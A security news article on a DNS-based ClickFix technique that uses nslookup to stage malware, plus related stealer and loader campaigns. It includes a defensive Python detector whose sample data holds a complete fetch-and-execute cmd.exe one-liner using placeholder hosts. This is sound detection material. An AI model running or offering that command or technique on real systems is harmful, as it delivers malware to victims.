Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging

By Declan Murphy, February 15, 2026

Microsoft has disclosed details of a new version of the ClickFix social engineering tactic in which the attackers trick unsuspecting users into running commands that perform a Domain Name System (DNS) lookup to retrieve the next-stage payload.

Specifically, the attack relies on using the "nslookup" (short for nameserver lookup) command to execute a custom DNS lookup triggered via the Windows Run dialog.

ClickFix is an increasingly popular technique that is traditionally delivered via phishing, malvertising, or drive-by download schemes, often redirecting targets to bogus landing pages that host fake CAPTCHA verification or instructions to address a non-existent problem on their computers by running a command either via the Windows Run dialog or the macOS Terminal app.

The attack method has become widespread over the past two years because it hinges on the victims infecting their own machines with malware, thereby allowing the threat actors to bypass security controls. The effectiveness of ClickFix has been such that it has spawned several variants, such as FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.

"In the latest DNS-based staging using ClickFix, the initial command runs via cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system's default resolver," the Microsoft Threat Intelligence team said in a series of posts on X. "The output is filtered to extract the `Name:` DNS response, which is executed as the second-stage payload."

Microsoft said this new variation of ClickFix uses DNS as a "lightweight staging or signaling channel," enabling the threat actor to reach infrastructure under their control, as well as erect a new validation layer before executing the second-stage payload.

"Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic," the Windows maker added.

The downloaded payload subsequently initiates an attack chain that leads to the download of a ZIP archive from an external server ("azwsappdev[.]com"), from which a malicious Python script is extracted and run to conduct reconnaissance, run discovery commands, and drop a Visual Basic Script (VBScript) responsible for launching ModeloRAT, a Python-based remote access trojan previously distributed via CrashFix.

To establish persistence, a Windows shortcut (LNK) file pointing to the VBScript is created in the Windows Startup folder so that the malware is automatically launched every time the operating system is started.
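As an added example (not part of Microsoft's reporting or of any vendor's product), the following defender-side check scores process-creation events against the staging pattern described above: cmd.exe spawned by explorer.exe (the Run dialog's parent), nslookup pointed at a hard-coded external server instead of the default resolver, output filtered for the `Name:` record, and that output handed to `for /f` for execution. The event fields, sample command lines, TEST-NET addresses and `.invalid` names are all constructed for illustration.

```python
import ipaddress
import re
from collections import namedtuple

# Minimal process-creation record, modelled on Sysmon Event ID 1 fields (constructed for this example).
ProcessEvent = namedtuple("ProcessEvent", "parent_image image command_line")
# Resolvers in these ranges count as the organisation's own; anything else is treated as "external".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
SEPARATORS = {"|", "&", "&&", "||"}  # tokens that end nslookup's argument list in a cmd.exe one-liner

def nslookup_args(cmdline: str) -> list[str]:
    """Positional arguments handed to nslookup (options dropped); [] when nslookup is absent."""
    toks = re.sub("[()'\"^]", " ", cmdline).replace("|", " | ").split()
    for i, tok in enumerate(toks):
        if tok.lower().rsplit("\\", 1)[-1] in ("nslookup", "nslookup.exe"):
            rest = toks[i + 1:]
            end = next((j for j, t in enumerate(rest) if t in SEPARATORS), len(rest))
            return [t for t in rest[:end] if not t.startswith("-")]
    return []

def is_external_resolver(server: str) -> bool:
    """True when the explicit server lies outside INTERNAL_NETS; a hostname counts as external."""
    try:
        ip = ipaddress.ip_address(server)
    except ValueError:
        return True
    return not any(ip in net for net in INTERNAL_NETS)

def detect(ev: ProcessEvent) -> tuple[str, list[str]]:
    """Score one event against the DNS-staging pattern; returns (verdict, reasons)."""
    cl, args, reasons = ev.command_line, nslookup_args(ev.command_line), []
    if not args:  # no nslookup invocation at all
        return "benign", reasons
    if ev.parent_image.lower().endswith("explorer.exe"):
        reasons.append("spawned by explorer.exe, the parent of Run-dialog commands")
    if len(args) >= 2 and is_external_resolver(args[1]):
        reasons.append(f"hard-coded external DNS server {args[1]} instead of the default resolver")
    if re.search(r"\b(findstr|find)\b[^|&]*\bname:", cl, re.IGNORECASE):
        reasons.append("output filtered for the Name: record")
    if re.search(r"\bfor\s+/f\b", cl, re.IGNORECASE):
        reasons.append("filtered output fed to for /f, i.e. executed")
    return ("alert" if len(reasons) >= 3 else "review" if reasons else "benign"), reasons

# Constructed sample telemetry (not from the report); .invalid names and TEST-NET addresses are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\nslookup.exe", "nslookup intranet.example.internal"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c nslookup fileserver.example.internal 198.51.100.53"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c for /f \"tokens=2\" %i in ('nslookup stage.example.invalid 203.0.113.10 ^| findstr Name:') do %i"),
]
```

The three samples resolve to `benign`, `review` and `alert` respectively; a single indicator such as a user running nslookup from the Run dialog only earns a review, while the full combination of external resolver, `Name:` filter and `for /f` execution raises an alert.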

The disclosure comes as Bitdefender warned of a surge in Lumma Stealer activity, driven by ClickFix-style fake CAPTCHA campaigns that deploy an AutoIt version of CastleLoader, a malware loader associated with a threat actor codenamed GrayBravo (formerly TAG-150).

CastleLoader incorporates checks to determine the presence of virtualization software and specific security programs before decrypting and launching the stealer malware in memory. Outside of ClickFix, websites advertising cracked software and pirated movies serve as bait for CastleLoader-based attack chains, deceiving users into downloading rogue installers or executables masquerading as MP4 media files.

Other CastleLoader campaigns have also leveraged websites promising cracked software downloads as a starting point to distribute a fake NSIS installer that also runs obfuscated VBA scripts prior to running the AutoIt script that loads Lumma Stealer. The VBA loader is designed to run scheduled tasks responsible for ensuring persistence.

"Despite significant law enforcement disruption efforts in 2025, Lumma Stealer operations continued, demonstrating resilience by quickly migrating to new hosting providers and adapting different loaders and delivery methods," the Romanian cybersecurity company said. "At the core of many of these campaigns is CastleLoader, which plays a central role in helping LummaStealer spread via supply chains."

Interestingly, one of the domains on CastleLoader's infrastructure ("testdomain123123[.]store") was flagged as a Lumma Stealer command-and-control (C2), indicating that the operators of the two malware families are either working together or sharing service providers. The majority of Lumma Stealer infections have been recorded in India, followed by France, the U.S., Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.

"The effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities," Bitdefender said. "The instructions resemble troubleshooting steps or verification workarounds that users may have encountered before. As a result, victims often fail to recognize that they are manually executing arbitrary code on their own system."

CastleLoader isn't the only loader that is being used to distribute Lumma Stealer. Campaigns observed as early as March 2025 have leveraged another loader dubbed RenEngine Loader, with the malware propagated under the guise of game cheats and pirated software like the CorelDRAW graphics editor. In these attacks, the loader makes way for a secondary loader named Hijack Loader, which then deploys Lumma Stealer.

According to data from Kaspersky, RenEngine Loader attacks have primarily affected users in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France since March 2025.

The developments coincide with the emergence of various campaigns using social engineering lures, including ClickFix, to deliver a variety of stealers and malware loaders:

• A macOS campaign that has used phishing and malvertising ploys to deliver Odyssey Stealer, a rebrand of Poseidon Stealer, which itself is a fork of Atomic macOS Stealer (AMOS). The stealer exfiltrates credentials and data from 203 browser wallet extensions and 18 desktop wallet applications to facilitate cryptocurrency theft.
• "Beyond credential theft, Odyssey operates as a full remote access trojan," Censys said. "A persistent LaunchDaemon polls the C2 every 60 seconds for commands, supporting arbitrary shell execution, reinfection, and a SOCKS5 proxy for tunneling traffic through victim machines."
• A ClickFix attack chain targeting Windows systems that uses fake CAPTCHA verification pages on legitimate-but-compromised websites to trick users into executing PowerShell commands that deploy the StealC information stealer.
• An email phishing campaign that uses a malicious SVG file contained within a password-protected ZIP archive to instruct the victim to run a PowerShell command using ClickFix, ultimately resulting in the deployment of an open-source .NET infostealer called Stealerium.
• A campaign that exploits the public sharing feature of generative artificial intelligence (AI) services like Anthropic Claude to stage malicious ClickFix instructions on how to perform a variety of tasks on macOS (e.g., "online DNS resolver"), and distribute those links via sponsored results on search engines like Google to deploy Atomic Stealer and MacSync Stealer.
• A campaign that directs users searching for "macOS cli disk space analyzer" to a fake Medium article impersonating Apple's Support Team to deceive them into running ClickFix instructions that deliver next-stage stealer payloads from an external server, "raxelpak[.]com."
• "The C2 domain raxelpak[.]com has URL history going back to 2021, when it appeared to host a safety workwear e-commerce website," MacPaw's Moonlock Lab said. "Whether the domain was hijacked or simply expired and re-registered by the [threat actor] is unclear, but it fits the broader pattern of leveraging aged domains with existing reputation to avoid detection."
• A variation of the same campaign that stages ClickFix instructions for supposedly installing Homebrew on links associated with Claude and Evernote via sponsored results to install stealer malware.
• "The ad shows a real, recognized domain (claude.ai), not a spoof or typo-squatted website," AdGuard said. "Clicking the ad leads to a real Claude page, not a phishing copy. The result is clear: Google Ads + a well-known trusted platform + technical users with high downstream impact = a potent malware distribution vector."
• A macOS email phishing campaign that prompts recipients to download and run an AppleScript file to address supposed compatibility issues, resulting in the deployment of another AppleScript designed to steal credentials and retrieve additional JavaScript payloads.
• "The malware does not grant permissions to itself; instead, it forges TCC authorizations for trusted Apple-signed binaries (Terminal, osascript, Script Editor, and bash) and then executes malicious actions through these binaries to inherit their permissions," Darktrace said.
• A ClearFake campaign that employs fake CAPTCHA lures on compromised WordPress sites to trigger the execution of an HTML Application (HTA) file and deploy Lumma Stealer. The campaign is also known to use malicious JavaScript injections to make use of a technique known as EtherHiding to execute a contract hosted on the BNB Smart Chain and fetch an unknown payload hosted on GitHub.
• EtherHiding offers attackers several advantages, allowing malicious traffic to blend with legitimate Web3 activity. Because the blockchain is immutable and decentralized, it offers increased resilience in the face of takedown efforts.

A recent analysis published by Flare has found that threat actors are increasingly targeting Apple macOS with infostealers and sophisticated tools.

"Nearly every macOS stealer prioritizes cryptocurrency theft above all else," the company said. "This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once seed phrases are compromised, funds disappear permanently with no recourse."

"The 'Macs don't get viruses' assumption is not just outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage."
